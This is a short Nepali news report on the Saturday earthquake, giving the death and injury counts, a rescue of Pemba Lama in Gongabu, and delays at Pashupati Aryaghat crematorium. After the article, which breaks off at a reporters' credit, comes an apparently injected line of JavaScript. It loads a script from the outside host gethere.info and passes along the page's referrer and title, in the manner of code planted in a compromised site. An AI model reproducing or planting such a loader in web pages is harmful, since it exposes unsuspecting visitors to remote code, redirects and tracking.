शनिबार गएको भूकम्पमा परी ज्यान गुमाउनेको संख्या पाँच हजार चार सय ८९ पुगेको छ । १० हजार नौ सय ६५ जना घाइते भएको छ । उनीहरुको विभिन्न अस्पतालमा उपचार भइरहेको छ।
भूकम्पले भग्नावशेष बनाएका स्थानमा उद्दार कार्य जारी रहेको छ । केही ठाउँमा अझै पनि जीवितै उद्दार गरिएको छ । नुवाकोटका पेम्बा लामालाई आजै गोंगबुबाट जीवितै उद्दार गरिएको छ।
भग्नावशेष भएका स्थानमा पुरिएर ज्यान गुमाउनेहरुको संख्या बढ्दै गएको छ । भूकम्पमा परी ज्यान गुमाउनेको संख्या धेरै भएपछि दाहसंस्कारमा पनि कठिनाइ उत्पन्न भएको छ । एउटा शवलाई जलाउन धेरैबेरसम्म आर्यघाटमा पर्खनुपर्ने अवस्था रहेको छ।
पशुपति आर्यघाटमा पुगेर कमल राना र बिक्रम शाक्यले तयार पारेको स्थलगत रिपोर्ट……..
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;